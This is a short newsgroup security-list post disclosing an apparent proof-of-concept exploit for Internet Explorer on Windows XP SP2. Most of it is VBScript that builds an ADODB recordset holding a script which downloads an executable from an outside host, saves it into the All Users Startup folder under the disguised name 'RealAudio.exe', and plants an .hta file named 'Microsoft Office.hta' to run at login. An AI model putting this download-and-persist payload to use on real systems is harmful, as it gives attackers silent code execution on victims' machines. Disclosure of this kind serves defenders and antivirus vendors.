Re: YET AGAIN Automatic remote compromise of Internet Explorer Service Pack 2 XP SP2

"Michael Evanchik" <[email protected]>
Newsgroups gmane.comp.security.vulnerabilities.watch.announce,gmane.comp.security.ntbugtraq
Organization MichaelEvanchik.com
Message-ID <[email protected]>
PoC: http://www.michaelevanchik.com/security/microsoft/ie/xss/index.html

Here is some new adodb code AVP's should add.  No longer needed to connect to external source.  Malicious recordset can be built locally.

on error resume next
set evanchik = CreateObject("ADODB.Recordset")
   With objRS
       .Fields.Append "evanchik", 200, "3000"
       Call .Open
       Call .AddNew
       .Fields("evanchik").Value = "meaning less shit i had to put here"
       Call .AddNew
       .Fields("evanchik").Value = "<script language=vbscript>: on error resume next : set o = CreateObject(""msxml2.XMLHTTP"") : o.open ""GET"",""http://hometown.aol.com/mcbain/calc.exe"",False : o.send : set s = createobject(""adodb.stream"") : s.type=1 : s.open : s.write o.responseBody : s.savetofile ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup\RealAudio.exe"",2 : </script>"
       Call .Update
   End With
evanchik.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML

evanchik.Close
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.